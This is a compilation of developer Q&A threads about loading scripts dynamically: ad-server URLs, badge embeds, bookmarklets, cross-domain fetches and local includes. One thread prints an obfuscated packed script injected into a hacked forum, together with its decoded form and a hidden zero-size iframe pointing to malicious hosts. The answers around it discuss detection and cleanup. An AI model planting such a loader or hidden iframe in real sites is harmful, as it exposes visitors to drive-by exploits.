So here is the situation, I'm getting an ad from my custom adserver like so:
src = 'http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/';
script = document.createElement 'script'
script.type = 'text/javascript'
script.src = src
$('.banner-container').append script
So the problem is the URL is correct in the src variable, and it is correct when it is inserted into the DOM:
<script type="text/javascript" src="http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/"></script>
But the second the browser tries to fetch it the url changes to
http://www.adserver.comwww/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/
See, right after the .com it strips the / so that comwww runs together, making it throw an error and of course not display what I want. I have tried URI encoding and other little things I had read or seen on Stack Overflow, to no avail.
Perhaps the problem is on the ad server site. They likely have a bad rewriterule, or a bad internal redirect. I have run your sample code with a different domain and it works fine.
Try visiting the js url in your browser directly, or using a command line tool like curl. Check that it is redirecting. So it is likely that the adserver.com site is redirecting badly. If they have a support contact, you should file a ticket with that company.
I am sorry that this does not directly solve your problem, but I feel that this response is a proper "answer" for this site.
I have a certification and a badge provided by Acclaim. I want to embed it in my personal website but it's not working. Here's the code they provided:
<div data-iframe-width="150" data-iframe-height="270" data-share-badge-id="60615e70-6409-4752-9d77-3553a43d13d2" data-share-badge-host="https://www.youracclaim.com"></div>
<script type="text/javascript" async src="//cdn.youracclaim.com/assets/utilities/embed.js"></script>
but even when simply put onto an empty html:5 page, I get the error: Loading failed for the <script> with source “file:///assets/utilities/embed.js”.
What's the problem here? I'm not sure how Acclaim can provide a ready-to-paste script that's just simply not working, nothing shows up on the website. I'm guessing the problem is at the src... part, but don't know how to fix it.
If you're loading your page via file:, then protocol-relative URLs aren't going to work. The script tag has:
src="//cdn.youracclaim.com/assets/utilities/embed.js"
This should be changed to:
src="https://cdn.youracclaim.com/assets/utilities/embed.js"
You'll find though that when you're using an actual web server, this is a non-issue. The reason for the protocol-relative URLs is so that HTTP pages would use the HTTP version, and HTTPS would use the HTTPS version. This method is outdated anyway. HTTPS should be used everywhere, even if you're loading HTTPS JavaScript from an HTTP page.
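The scheme inheritance described in this answer can be checked offline with the standard URL parser. This is an added example, not part of the original answer; the page URLs (`example.test`, the local file path) and the function names are assumptions made for illustration.

```javascript
// Constructed input: the embed tag quoted in the question.
const EMBED = '<script type="text/javascript" async ' +
  'src="//cdn.youracclaim.com/assets/utilities/embed.js"></script>';

// Resolve a script src against the page URL (URL Standard rules, the same
// ones browsers apply) and classify how the script would be fetched.
function auditScriptSrc(pageUrl, src) {
  const page = new URL(pageUrl);
  const resolved = new URL(src, pageUrl);
  let verdict;
  if (resolved.protocol === 'https:') {
    verdict = 'ok';                        // fetched over TLS
  } else if (resolved.protocol === 'http:' && page.protocol === 'https:') {
    verdict = 'blocked-mixed-content';     // current browsers refuse this load
  } else if (resolved.protocol === 'http:') {
    verdict = 'insecure-transport';        // script can be altered in transit
  } else {
    verdict = 'non-http-scheme';           // e.g. file: inherited from a local page
  }
  return { scheme: resolved.protocol, verdict };
}

// Pin protocol-relative script sources in a snippet to https.
function pinToHttps(html) {
  return html.replace(/(<script\b[^>]*?\bsrc=["'])\/\/(?=[^/])/gi, '$1https://');
}

// Audit every script src in a snippet under several page contexts.
function auditSnippet(html, pageUrls) {
  const srcs = [...html.matchAll(/<script\b[^>]*?\bsrc=["']([^"']+)["']/gi)]
    .map(m => m[1]);
  return pageUrls.flatMap(page =>
    srcs.map(src => ({ page, src, ...auditScriptSrc(page, src) })));
}

// Constructed page contexts: a local file, a plain-HTTP site, an HTTPS site.
const PAGES = ['file:///home/user/badge.html', 'http://example.test/', 'https://example.test/'];
console.log(auditSnippet(EMBED, PAGES));
console.log(auditSnippet(pinToHttps(EMBED), PAGES));
```

The first audit reports a different scheme for each page context; after pinning, all three contexts fetch over https.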
I have been trying to turn a bookmarklet into a small development environment that I can use for testing some javascript and sending commands easily on the fly and updating the code on my server quickly to see the result. This has halfway worked using methods I have found on this site and Google, however it doesn't seem to work very well and sometimes randomly doesn't work. The end goal is to have a bookmarklet that I can click on from any page and it loads a javascript file I have saved on my server. I have created the following two bookmarklets to try and get this working:
Failed Method 1:
javascript:
var s = document.createElement('script');
s.type='text/javascript';
document.body.appendChild(s);
s.src='//smewth.com/test.js';
void(0);
Method 1 in one line bookmarklet form: javascript: var s = document.createElement('script'); s.type='text/javascript'; document.body.appendChild(s); s.src='//smewth.com/test.js'; void(0);
Failed Method 2:
javascript:(
function(){
var imported = document.createElement('script');
imported.type='text/javascript';
imported.src = 'https://smewth.com/test.js';
document.head.appendChild(imported);
})();
Method 2 in one line bookmarklet form: javascript:( function(){ var imported = document.createElement('script'); imported.type='text/javascript'; imported.src = 'https://smewth.com/test.js'; document.head.appendChild(imported); })();
I got method 1 by decomposing the kickass bookmarklet from (http://kickassapp.com/). The actual one I got from their site works fine on my browser no problems. I even did a direct substitution from the URL they were using to load with my URL. The second method I found while searching on this site and this actually worked for a small while and stopped working for some unknown reason (maybe different browsers). I tried appending this script object to the head and the body on each of them with no improved results.
I created the test.js script just for this post and it contains a simple alert box statement:
$$ [/]# cat test.js
alert("hi");
$$ [/]#
NOTE: When I do this with the code embedded within the bookmarklet itself without appending it to a head/body object then it works fine such as this:
javascript:%20alert("hi");
I did notice that with both of these methods, the code is actually getting injected into the page however I am not seeing the code is ever executed when I click the bookmark. Does anyone know which method is the best or something similar to do this so I can have javascript load through a page which I update on a remote server (reliably)? Maybe I need to attach the to a different object?
Thank you for your help.
-Jeff
UPDATE: I am showing this works while this site is loaded but it doesn't work when you're at a site like google.com. Not sure what the difference is or how to accommodate this, google.com has a head and a body object too. I am showing this works in some sites and in some it doesn't.
I figured this out. There were two things occurring which accounts for the intermittent symptom of this issue. The first issue was that the site which was hosting the code was on a self-signed certificate. I began to notice the issue was occurring only when trying to run this from within secure sites. Then in Chrome I saw an error show up in the console. It would be nice if Firefox gave me an error on the console or something as this was the root of the issue. The second thing I had to do was disable OCSP in Firefox as I used a free certificate for testing purposes.
I also had to use method 1 as described above. Firefox and Chrome both did not like the anonymous function call for some reason. From now on I will refer to Chrome to look for errors in the console as Firefox has proven itself not very useful for this.
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
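The decoding step JS Beautifier performed above can be reproduced statically, without executing the packed code. This is an added example, not part of the original answers; the file names in `SAMPLE_FILES` and all function names are constructed for illustration, and the unpacker assumes this packer variant with a radix of at most 36.

```javascript
// Constructed sample: the packed script body quoted in the question.
const PACKED = String.raw`eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))`;

// Wrapper signature, and the trailing call that carries the arguments:
// ('payload', radix, count, 'word|list'.split('|'), ...)
const SIGNATURE = /eval\(function\(p,a,c,k,e,[rd]\)/;
const CALL = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

// Rebuild the hidden source by substitution only; nothing is eval'd or run.
function unpack(source) {
  const m = CALL.exec(source);
  if (!m) return null;
  const radix = Number(m[2]);
  if (radix < 2 || radix > 36) return null;       // outside the assumed variant
  const payload = m[1].replace(/\\(.)/g, '$1');   // undo \' escaping
  const words = m[4].split('|');
  return payload.replace(/\b\w+\b/g, tok => {
    const i = parseInt(tok, radix);
    // Only substitute tokens that are exact base-`radix` indexes with a word.
    return (i.toString(radix) === tok && words[i]) ? words[i] : tok;
  });
}

// Pull out every URL assigned to a .src property in the decoded text.
function injectedSources(code) {
  return [...code.matchAll(/\.src\s*=\s*(['"])(.*?)\1/g)].map(m => m[2]);
}

// Scan a {filename: contents} map and report files carrying a packed script.
function scan(files) {
  const findings = [];
  for (const [name, text] of Object.entries(files)) {
    if (!SIGNATURE.test(text)) continue;
    const decoded = unpack(text);
    findings.push({ name, decoded, loads: decoded ? injectedSources(decoded) : [] });
  }
  return findings;
}

const SAMPLE_FILES = {                              // constructed names and contents
  'forum-page.html': `<head><script>${PACKED}</script></head>`,
  'clean-page.html': '<head><title>ok</title></head>',
};
console.log(scan(SAMPLE_FILES));
```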
First thing you should do is to change your FTP or SSH login and password.
The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.
Even though you overwrite your files the problem may come back. So I strongly suggest to check
note the last modified date of the files in question.
check your FTP, SSH, Access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
1b. Overwrite your files from Backup
if your apache or any webserver that you are using does not have a pending update.
Check the file permission for your website
Change your FTP password immediately
Advice: change your passwords to something strong. e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845; the two lines were replacing </head> with their script+</head>
Tough one to find and smart too.
I resolved this problem. You must find and delete the Base64 function with the shady string in the site files. It decodes this script from the string.
I would like to grab an element from a remote HTML page. As I am requesting data from a different domain I am using the below code to add the source as a script. Yes, very dodgy.
<script type="text/javascript">
var script = document.createElement('script');
script.setAttribute('type', 'text/javascript');
script.setAttribute('src', 'http://remoteDomain.com/page.html');
document.getElementsByTagName('head')[0].appendChild(script);
</script>
The above code fetches and appends the entire page to my document head. Seems to work okay. However now I would like to be able to grab an element by ID, or even regex from this source.
Can this be done?
I am aware that the above code is dirty, so I'd be happy to receive any suggestions to clean it up!
Indeed very dodgy... But there are cross-domain AJAX techniques that you can use. Some help here: http://usejquery.com/posts/9/the-jquery-cross-domain-ajax-guide
The above code fetches and appends the entire page to my document head.
It doesn't really, it just creates a script element of which its src points there.
It looks like you are trying to get around Same Origin Policy.
Can you use a server side proxy?
Browsers go to great lengths to prevent this being done client-side unless the site you're trying to read explicitly opts in.
Otherwise any random web page you visit could read info from your bank account, say.
This is a very "standard" piece of JavaScript code (I've seen it on thousands of examples), but it doesn't work for me:
<html>
<head>
<title>Temp</title>
<script type="text/javascript">
function start() {
var newScript = document.createElement('script');
newScript.type = "text/javascript";
newScript.src = "toBeIncluded.js"; // THIS ONE DOES NOT WORK
document.body.appendChild(newScript);
// alert(newScript.contentText);
}
</script>
</head>
<body onload='start()'>
</body>
</html>
In fact I don't get any error, and the tag actually gets appended - unfortunately it is completely empty (I check it with the commented alert line). Please consider that the "toBeIncluded.js" file exists, is not empty, and is in the same local directory as this HTML (I'm running everything locally on my PC).
Please help, I've tried lots of possible variations (change directories, include full path, move code to the "body" section, ...) but no success.
I would recommend installing the Firebug extension for Firefox. There is also a Firebug Lite script for use in other browsers. They work in different ways but have similar features. As others have mentioned, you may benefit from viewing HTTP transaction information. In Firebug this is available in the "Net" panel. If the browser attempts to load the script, then you should see an item in the Net panel. (Make sure you have "All" or "Script" selected in the Net panel options).
If you see the script request listed, then the outcome of the request should also be listed. If it is "404 Not Found", for example, then the URL did not resolve properly. If it is "200 OK" or "304 Not Modified", then the request was successful. If the item shows a small spinner graphic, then it is still trying to connect to the target server.
If the Net panel indicates that the request was successful, then go to the "HTML" panel. The HTML panel shows you the current state of the document object, so if your start function executed properly, then you'll see a "script" element as a child of the body element.
If the script element is successfully added but no HTTP request is made, then you may have a problem with browser security settings. For example, if the request crosses the boundary of HTTP/HTTPS or http/file protocols, the browser may silently decline it.
Try opening a new browser window and requesting the script URL directly. This should help to rule out a misspelled URL or server connection issues.